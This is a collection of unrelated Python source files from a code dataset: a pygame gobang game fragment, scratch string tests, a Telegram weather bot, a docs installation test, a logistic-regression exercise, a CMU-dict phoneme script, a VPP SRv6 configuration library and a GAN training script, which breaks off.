pygame!',font_size=20, positon=(0,0)):\n\t# font_type = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc', 1)\n\tfont_type = pygame.freetype.Font('./consola.ttf', 1)\t\n\tfont_rect = font_type.render_to(background, positon, string, fgcolor=font_color, size=font_size)\n\tscreen.blit(background, (0, 0))\n\ndef draw_chessboard_rect(background, rect_point, border):\n\tx_num = int((width - 1.5 * border) / border)\n\ty_num = int((height - 1.5 * border) / border)\n\tfor num_w in range(x_num):\n\t\tfor num_h in range(y_num):\n\t\t\trect_point.append([num_w*border + 50, num_h*border + 50])\n\tfor item in rect_point:\n\t\ts_rect = item[0], item[1], border, border\n\t\tpygame.draw.rect(background, line_color, s_rect, 1)\n\treturn rect_point\n\ndef success(positon):\n\tfor item in positon:\n\t\t# 行\n\t\tif [item[0]+1,item[1]] in positon:\n\t\t\tif [item[0]+2,item[1]] in positon:\n\t\t\t\tif [item[0]+3,item[1]] in positon:\n\t\t\t\t\tif ([item[0]+4,item[1]] in positon):\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\t# 列\n\t\telif [item[0],item[1]+1] in positon:\n\t\t\tif [item[0],item[1]+2] in positon:\n\t\t\t\tif [item[0],item[1]+3] in positon:\n\t\t\t\t\tif [item[0],item[1]+4] in positon:\n\t\t\t\t\t\treturn True\n\t\t# 对角\n\t\telif [item[0]+1,item[1]+1] in positon:\n\t\t\tif [item[0]+2,item[1]+2] in positon:\n\t\t\t\tif [item[0]+3,item[1]+3] in positon:\n\t\t\t\t\tif [item[0]+4,item[1]+4] in positon:\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef success_judge(chess_dict):\n\tblack_pos = []\n\twhite_pos = []\n\tglobal successor\n\t# print(chess_dict)\n\t# {'10,4': 2, '10,5': 1, '6,4': 2, '6,5': 1, '8,7': 2, '5,7': 1, '6,9': 2, '9,4': 1, '9,6': 2, '10,8': 1}\n\tfor item in chess_dict:\n\t\tx = item.split(\",\", 1)\n\t\tif chess_dict[item] == 1:\n\t\t\twhite_pos.append([int(x[0]),int(x[1])])\n\t\telse:\n\t\t\tblack_pos.append([int(x[0]),int(x[1])])\n\t\n\tprint(\"white_pos = \", white_pos)\n\tprint(\"black_pos = \", black_pos)\n\n\tif success(white_pos):\n\t\tsuccessor = \"white\"\n\t\treturn True\n\telif success(black_pos):\n\t\tsuccessor = \"black\"\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\t\tif success(white_pos):\n\t\t\tsuccessor = \"white\"\n\t\t\treturn True\n\t\t\tcontinue\n\t\telif success(black_pos):\n\t\t\tsuccessor = \"black\"\n\t\t\treturn True\n\t\t\tcontinue\n\"\"\"\n\ndef game_over(background, delay_time):\n\timport time,sys\n\tdraw_font(background, string=\"game over!\")\n\ttime.sleep(delay_time)\n\tsys.exit()\n\n\n# put chess down \ndef chess_down(background, position, color):\n\tpygame.draw.circle(background, color, position, 20, 0)\n\n\n\nmouse_pos = []\nblack_position = []\nwhite_position = []\nkey_flag = 0\nendflag = False\nwhile True:\n\t# event manage\n\tfor event in pygame.event.get():\n\t\t# quit\n\n\t\tif event.type == pygame.QUIT:\n\t\t\tgame_over(background, 0.3)\n\t\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame_over(background, 0.1)\n\n\t\t# elif event.type == pygame.KEYDOWN:\n\t\t# \tif event.key == 'K_RETURN':\n\t\t# \t\tendflag = 0\n\t\t# window resize\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tsize = width, height = event.size[0], event.size[1]\n\t\t\tscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\n\t\t\tbackground = pygame.Surface(screen.get_size())\n\t\telif endflag:\n\t\t\tcontinue\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos.append([event.pos[0],event.pos[1]])\t# .pos --> tuple = (x_pos,y_pos)\n\n\trect_point = []\n\tbackground.fill(bg_color)\n\tdraw_chessboard_rect(background, rect_point, border)\n\tdraw_font(background, string=wlc_str)\n\n\tchess_dict = {}\n\tcount = 0\n\tfor position in mouse_pos:\n\t\t# position calculate:\n\t\tposition[0] = round(position[0] / 50) * 50\n\t\tposition[1] = round(position[1] / 50) * 50\n\n\t\tif (width//50 > round(position[0]/50) > 0) and (height//50 > round(position[1]//50) > 0):\n\t\t\tkey = str(position[0]//50)+\",\"+str(position[1]//50)\n\t\t\t# print(key)\n\t\t\t# flags \n\t\t\t# 0 -- no\n\t\t\t# 1 -- white\n\t\t\t# 2 -- black\n\n\t\t\tif key not in chess_dict:\n\t\t\t\tkey_flag = 1\n\t\t\t\t# flags = 0\n\t\t\t\tif count % 2 == 0:\n\t\t\t\t\tchess_color = BLACK\n\t\t\t\t\tflags = 2\n\t\t\t\telse:\n\t\t\t\t\tchess_color = WHITE\n\t\t\t\t\tflags = 1\n\t\t\t\tcount = count + 1\n\t\t\t\t# 归一化\n\t\t\t\tnew_dict = {key : flags}\n\t\t\t\tchess_dict.update(new_dict)\n\t\t\t\tchess_down(background, position, chess_color)\n\t\t\telse:\n\t\t\t\tkey_flag = 0\n\tprint(chess_dict)\n\tendflag = success_judge(chess_dict)\t# judgement advancement to fix bug 3\n\tif endflag:\n\t\tdraw_font(background, string=\"Congradulations! \"+successor+\" wins!\",font_size=20, positon=(300,20))\n\t\t# endflag = success_judge(chess_dict)\t\t# error bug 3\n\t# endflag = success_judge(chess_dict)\t\t\t# error bug 3\n\n\n\n\tscreen.blit(background, (0,0))\n\tfclock.tick(fps)\n\tpygame.display.update()\n\n","sub_path":"gobang/Gobang_v1.3.py","file_name":"Gobang_v1.3.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"248242750","text":"#using for test case when need . complete empty py.\n'''\nurl = \"http://zombie-bites.com/j/df\"\nprint(url.split(\"//\")[-1].split('www.')[-1].split('.')[0] )\n'''\ns='Hello world. ooo'\nprint(s.count('o'))\n\nprint(ord('a'), ord('b'))\nprint(ord('A'), ord('B'))\nlist =[1,2,3,4,8,6]\nlist.sort()\nprint(list)\ns1 ='one two three'\nlist = s1.split()\nprint(list)\nmax= 0\nfor c in list:\n if len(c)>max:\n max = len(c)\nfor c in range(len(list)-1,-1,-1):\n if len(list[c]) ==max:\n print(list[c])\n break\nprint(ord('a')-96)\n\nprint(ord('a'),ord('A'))","sub_path":"python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"393983667","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport os\r\nimport requests\r\nfrom pymongo import MongoClient\r\n\r\nDARKSKY_TOKEN = os.environ.get(\"DARKSKY_API_KEY\")\r\nTELEGRAM_TOKEN = os.environ.get(\"BOT_KEY\")\r\nDB_NAME = os.environ.get(\"MONGO_DB\")\r\nPORT = os.environ.get(\"PORT\")\r\nrepo = MongoClient(os.environ.get(\"MONGODB_URI\"))\r\n\r\nos.system('python -m http.server {} &'.format(PORT))\r\n\r\nstartText = \"Olá eu sou o AtmoBot, existo para providenciar dados e informações sobre o local que você providenciar. Para usar apenas mande uma menssagem de localização com o local de procura.\"\r\n\r\nmessageFormat_br = \"\"\"> Informações Atuais:\r\n{sum}\r\nVento: {wind} m/s {wind_speed_warn_now}\r\nTemperatura: {temp} ºC \r\nHumidade: {umid} g/m³\r\nVisibilidade: {visi} km\r\nChuva: {rain} % de chance\r\n\r\n> Informações Dia:\r\n{sum_day}\r\nVento: {wind_day} m/s {wind_speed_warn_day}\r\nTemperatura Maxima: {temp_day} ºC \r\nHumidade: {umid_day} g/m³\r\nVisibilidade: {visi_day} km\r\nChuva: {rain_day} % de chance\r\n\r\nRestrições Aéreas:\r\n\t- \"\"\"\r\n\r\nmessageFormat_en = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} m/s {wind_speed_warn_now}\r\nTemperature: {temp} ºC \r\nHumidity: {umid} g/m³\r\nVisibility: {visi} km\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} m/s {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºC \r\nHumidity: {umid_day} g/m³\r\nVisibility: {visi_day} km\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\nmessageFormat_us = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} mph {wind_speed_warn_now}\r\nTemperature: {temp} ºF \r\nHumidity: {umid} gr/ft3\r\nVisibility: {visi} miles\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} mph {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºF \r\nHumidity: {umid_day} gr/ft3\r\nVisibility: {visi_day} miles\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=startText)\r\n\r\ndef exit(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Shutting Down...\")\r\n exit(9)\r\n raise SystemExit\r\n\r\nupdater = Updater(token=TELEGRAM_TOKEN, use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\nexit_handler = CommandHandler('exit', exit)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(exit_handler)\r\n\r\ndef lang(update, context):\r\n message = update.message\r\n if message.text == \"/lang\":\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"/lang {EN/PT/US}\")\r\n return\r\n if context.args[0].lower() == \"en\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to EN\")\r\n if context.args[0].lower() == \"us\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'us'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to US\")\r\n if context.args[0].lower() == \"pt\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'pt', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Em Português.\")\r\n\r\n\r\ndef location(update, context):\r\n message = update.message\r\n request_data = {\r\n 'api_key': DARKSKY_TOKEN,\r\n 'latitude': message.location.latitude,\r\n 'longitude': message.location.longitude\r\n }\r\n\r\n message_log = {\r\n 'user': message.from_user.username,\r\n 'timestamp': message.date.timestamp(),\r\n 'lat': message.location.latitude,\r\n 'lon': message.location.longitude\r\n }\r\n\r\n userData = repo[DB_NAME].users.find_one({'name': message.from_user.username})\r\n params_query = {'units':'si', 'lang': 'pt'} \r\n if userData:\r\n params_query= userData\r\n\r\n requestURL = \"https://api.darksky.net/forecast/{api_key}/{latitude},{longitude}\".format_map(request_data)\r\n print(requestURL)\r\n r = requests.get(requestURL, params=params_query)\r\n\t\r\n if r.status_code == 200:\r\n datanow = r.json()[\"currently\"]\r\n dataday = r.json()[\"daily\"][\"data\"]\r\n print(dataday[0])\r\n selectData = {\r\n 'sum': datanow[\"summary\"],\r\n 'temp': datanow[\"temperature\"],\r\n 'rain': datanow[\"precipProbability\"] * 100,\r\n 'umid': datanow[\"humidity\"],\r\n 'wind': datanow[\"windSpeed\"],\r\n 'visi': datanow[\"visibility\"],\r\n 'sum_day': dataday[0][\"summary\"],\r\n 'temp_day': dataday[0][\"temperatureHigh\"],\r\n 'rain_day': dataday[0][\"precipProbability\"] * 100,\r\n 'umid_day': dataday[0][\"humidity\"],\r\n 'wind_day': dataday[0][\"windSpeed\"],\r\n 'visi_day': dataday[0][\"visibility\"],\r\n \"wind_speed_warn_now\": \"\",\r\n \"wind_speed_warn_day\": \"\"\r\n }\r\n \r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'pt':\r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'en':\r\n c_mesg = messageFormat_en\r\n if userData[\"units\"] == 'us':\r\n c_mesg = messageFormat_us \r\n \r\n if userData[\"units\"] == 'si':\r\n if int(selectData[\"wind\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n else:\r\n if int(selectData[\"wind\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n \r\n context.bot.send_message(chat_id=update.message.chat_id, text=c_mesg.format_map(selectData))\r\n repo[DB_NAME].logs.insert_one(message_log)\r\n\t\r\nlocation_handler = MessageHandler(Filters.location, location)\r\ndispatcher.add_handler(location_handler)\r\n\r\nlang_handler = CommandHandler('lang', lang)\r\ndispatcher.add_handler(lang_handler)\r\n\r\nupdater.start_polling()\r\n\r\n\r\n","sub_path":"Atmobot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"29717732","text":"import os\n\ndocs = ['dev_guide', 'user_guide']\n\n\ndef test_that_docs_are_installed():\n for doc in docs:\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/pdf/{doc}.pdf'.format(\n doc=doc)), 'PDF for {doc} was not installed'.format(doc=doc)\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/html/index.html'.format(\n doc=doc)), 'HTML for {doc} was not installed'.format(doc=doc)\n","sub_path":"k2/systest/debtest/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"477739910","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom week2.lr_utils import load_dataset\n\n\ndef sigmoid(z):\n \"\"\"\n Compute the sigmoid of z\n\n Arguments:\n z -- A scalar or numpy array of any size.\n\n Return:\n s -- sigmoid(z)\n \"\"\"\n\n s = 1/(1 + np.exp(-z))\n return s\n\n\ndef initialize_with_zeros(dim):\n \"\"\"\n This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\n\n Argument:\n dim -- size of the w vector we want (or number of parameters in this case)\n\n Returns:\n w -- initialized vector of shape (dim, 1)\n b -- initialized scalar (corresponds to the bias)\n \"\"\"\n\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nm_train = train_set_y.shape[1] # 209 training examples\nm_test = test_set_y.shape[1] # 50 Testing examples\nnum_px = train_set_x_orig.shape[1] # 64 by 64 by 3\n\n### START CODE HERE ### (≈ 2 lines of code)\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n### END CODE HERE ###\n\nprint(\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape: \" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\nprint(\"test_set_y shape: \" + str(test_set_y.shape))\nprint(\"sanity check after reshaping: \" + str(train_set_x_flatten[0:5,0]))\nprint(\"sigmoid([0, 2]) = \" + str(sigmoid(np.array([0,2]))))\n\ndim = 2\nw, b = initialize_with_zeros(dim)\nprint (\"w = \" + str(w))\nprint (\"b = \" + str(b))\n\nprint('done')\n","sub_path":"week2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"338548993","text":"\n# coding: utf-8\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport cmudict\nimport nltk\n\nnltk.download('punkt')\nprondict = cmudict.dict()\ndir_path = os.path.abspath('.')\nexl_path = dir_path + r'/sum_100.csv'\nprint(exl_path)\ndf = pd.read_csv(exl_path,engine='python',keep_default_na=False)\n\nstr_list= []\npro_origin_list =[]\npro_result_list = []\nsame_list = []\nchar_rep_rate_list =[]\nchar_full_list = []\n\ndef split_tran(txt):\n txt_revise = txt.replace(\",\", '').replace(\".\", '')\n split_result = nltk.word_tokenize(txt_revise)\n for i in range(len(split_result)):\n split_result[i] = prondict[split_result[i].lower()]\n if split_result[i]:\n split_result[i] = split_result[i][0]\n return split_result\n\ndef list_str(list_tmp):\n result_str = \"\"\n for i in range(len(list_tmp)):\n str_tmp = [str(j) for j in list_tmp[i]]\n str_join_tmp = ' '.join(str_tmp)\n result_str = result_str + \" \" + str_join_tmp\n return result_str\n\nfor index, row in df.iterrows():\n list_origin = split_tran(row[\"Origin\"])\n list_result = split_tran(row[\"Result\"])\n\n pro_origin_list.append(list_str(list_origin))\n pro_result_list.append(list_str(list_result))\n # str_tmp = ''\n # if row[\"Origin\"] == row[\"Result\"]:\n # same_list.append(1)\n # else:\n # same_list.append(0)\n #\n # for i in row['Result']:\n # for j in row['Origin'].lower():\n # if i == j:\n # str_tmp = ''.join([str_tmp,i])\n # break\n # str_diff_tmp = ''.join([str_tmp,i])\n # # char_full_list.append(0)\n # # break\n # # print(str_tmp)\n # str_list.append(str_tmp)\n # if str_tmp == row['Result']:\n # char_full_list.append(1)\n # else:\n # char_full_list.append(0)\n # char_rep_rate = len(str_tmp.replace(\" \", \"\"))/len(str(row['origin']).replace(\" \", \"\"))\n # char_rep_rate_list.append(char_rep_rate)\ndf['pro_origin'] = pro_origin_list\ndf['pro_result'] = pro_result_list\n# df['same'] = same_list\n# df['align'] = str_list\n\n# same_number = len(df[df['same'].isin(1)])\n# df['char_rate'] = char_rep_rate_list\n# df['char_full'] = char_full_list\n\ndf.to_csv('result_100.csv')\n","sub_path":"code/process/pho_tran.py","file_name":"pho_tran.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"606662046","text":"# Copyright (c) 2017 Cisco and/or its affiliates.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Segment Routing over IPv6 dataplane utilities library.\"\"\"\n\nfrom enum import Enum\n\nfrom resources.libraries.python.VatExecutor import VatTerminal\nfrom resources.libraries.python.VatJsonUtil import VatJsonUtil\nfrom resources.libraries.python.topology import Topology\n\n\nclass SRv6Behaviour(Enum):\n \"\"\"Defines SRv6 endpoint functions implemented in VPP.\"\"\"\n # Endpoint function\n END = 'end'\n # Endpoint function with Layer-3 cross-connect\n END_X = 'end.x'\n # Endpoint with decapsulation and Layer-2 cross-connect\n END_DX2 = 'end.dx2'\n # Endpoint with decapsulation and IPv4 cross-connect\n END_DX4 = 'end.dx4'\n # Endpoint with decapsulation and IPv4 table lookup\n END_DT4 = 'end.dt4'\n # Endpoint with decapsulation and IPv6 cross-connect\n END_DX6 = 'end.dx6'\n # Endpoint with decapsulation and IPv6 table lookup\n END_DT6 = 'end.dt6'\n\n\nclass SRv6(object):\n \"\"\"SRv6 class.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def configure_sr_localsid(node, local_sid, behavior, interface=None,\n next_hop=None, fib_table=None):\n \"\"\"Create SRv6 LocalSID and binds it to a particular behaviour on\n the given node.\n\n :param node: Given node to create localSID on.\n :param local_sid: LocalSID IPv6 address.\n :param behavior: SRv6 LocalSID function.\n :param interface: Interface name (Optional, required for\n L2/L3 xconnects).\n :param next_hop: Next hop IPv4/IPv6 address (Optional, required for L3\n xconnects).\n :param fib_table: FIB table for IPv4/IPv6 lookup (Optional, required for\n L3 routing).\n :type node: dict\n :type local_sid: str\n :type behavior: str\n :type interface: str\n :type next_hop: int\n :type fib_table: str\n :raises ValueError: If unsupported SRv6 LocalSID function used or\n required parameter is missing.\n \"\"\"\n if behavior == SRv6Behaviour.END:\n params = ''\n elif behavior in [SRv6Behaviour.END_X, SRv6Behaviour.END_DX4,\n SRv6Behaviour.END_DX6]:\n if interface is None or next_hop is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'\n 'next_hop:{1}'.format(interface, next_hop))\n interface_name = Topology.get_interface_name(node, interface)\n params = '{0} {1}'.format(interface_name, next_hop)\n elif behavior == SRv6Behaviour.END_DX2:\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n params = '{0}'.format(interface)\n elif behavior in [SRv6Behaviour.END_DT4, SRv6Behaviour.END_DT6]:\n if fib_table is None:\n raise ValueError('Required data missing.\\nfib_table:{0}\\n'.\n format(fib_table))\n params = '{0}'.format(fib_table)\n else:\n raise ValueError('Unsupported SRv6 LocalSID function: {0}'.\n format(behavior))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_add.vat', local_sid=local_sid,\n behavior=behavior, params=params)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def delete_sr_localsid(node, local_sid):\n \"\"\"Delete SRv6 LocalSID on the given node.\n\n :param node: Given node to delete localSID on.\n :param local_sid: LocalSID IPv6 address.\n :type node: dict\n :type local_sid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_del.vat', local_sid=local_sid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def show_sr_localsids(node):\n \"\"\"Show SRv6 LocalSIDs on the given node.\n\n :param node: Given node to show localSIDs on.\n :type node: dict\n \"\"\"\n with VatTerminal(node) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsids_show.vat')\n\n @staticmethod\n def configure_sr_policy(node, bsid, sid_list, mode='encap'):\n \"\"\"Create SRv6 policy on the given node.\n\n :param node: Given node to create SRv6 policy on.\n :param bsid: BindingSID - local SID IPv6 address.\n :param sid_list: SID list.\n :param mode: Encapsulation / insertion mode.\n :type node: dict\n :type bsid: str\n :type sid_list: list\n :type mode: str\n \"\"\"\n sid_conf = 'next ' + ' next '.join(sid_list)\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_add.vat', bsid=bsid,\n sid_conf=sid_conf, mode=mode)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_policy(node, bsid):\n \"\"\"Delete SRv6 policy on the given node.\n\n :param node: Given node to delete SRv6 policy on.\n :param bsid: BindingSID IPv6 address.\n :type node: dict\n :type bsid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_del.vat', bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def show_sr_policies(node):\n \"\"\"Show SRv6 policies on the given node.\n\n :param node: Given node to show SRv6 policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policies_show.vat')\n\n @staticmethod\n def configure_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Create SRv6 steering policy on the given node.\n\n :param node: Given node to create steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params = 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params = '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 steering policy for BindingSID {0} failed on '\n 'node {1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Delete SRv6 steering policy on the given node.\n\n :param node: Given node to delete steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n params = 'del'\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params += 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params += '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for bsid {0} failed on node {1}'.format(\n bsid, node['host']))\n\n @staticmethod\n def show_sr_steering_policies(node):\n \"\"\"Show SRv6 steering policies on the given node.\n\n :param node: Given node to show SRv6 steering policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_policies_show.vat')\n","sub_path":"resources/libraries/python/SRv6.py","file_name":"SRv6.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"400232648","text":"import tensorflow as tf\nfrom easydict import EasyDict as edict\nfrom tensorflow.python import keras\nfrom tensorflow.python.keras import layers\n\nfrom gans.callbacks import saver\nfrom gans.models import sequential\nfrom gans.trainers import optimizers\nfrom gans.trainers import vanilla_gan_trainer\n\nmodel_parameters = edict({\n 'batch_size': 256,\n 'num_epochs': 15,\n 'buffer_size': 100000,\n 'latent_size': 5,\n 'learning_rate_generator': 0.0002,\n 'learning_rate_discriminator': 0.0002,\n 'save_images_every_n_steps': 20\n})\n\n\ndef generate_samples(num_samples):\n x = tf.random.uniform(shape=[num_samples], minval=-10, maxval=10)\n y = tf.nn.sigmoid(x)\n data = tf.stack([x, y], axis=1)\n return tf.data.Dataset. \\\n from_tensor_slices(data). \\\n shuffle(model_parameters.buffer_size). \\\n batch(model_parameters.batch_size)\n\n\ndataset = generate_samples(num_samples=500000)\n\n\ndef validation_dataset():\n return tf.random.normal([model_parameters.batch_size, model_parameters.latent_size])\n\n\nvalidation_dataset = validation_dataset()\n\ngenerator = sequential.SequentialModel(\n layers=[\n keras.Input(shape=[model_parameters.latent_size]),\n layers.Dense(units=15),\n layers.ELU(),\n layers.Dense(units=10),\n layers.ELU(),\n layers.Dense(units=5),\n layers.ELU(),\n layers.Dense(units=2, activation='linear'),\n ]\n)\n\ndiscriminator = sequential.SequentialModel(\n [\n keras.Input(shape=[2]),\n layers.Dense(units=25, activation='relu'),\n layers.Dense(units=15, activation='relu'),\n layers.Dense(units=10, activation='relu'),\n layers.Dense(units=2, activation='sigmoid'),\n ]\n)\n\ngenerator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_generator,\n beta_1=0.5,\n)\ndiscriminator_optimizer = optimizers.Adam(\n learning_rate=model_parameters.learning_rate_discriminator,\n beta_1=0.5,\n)\n\ncallbacks = [\n saver.FunctionProblemSaver(\n save_images_every_n_steps=model_parameters.save_images_every_n_steps,\n )\n]\n\ngan_trainer = vanilla_gan_trainer.VanillaGANTrainer(\n 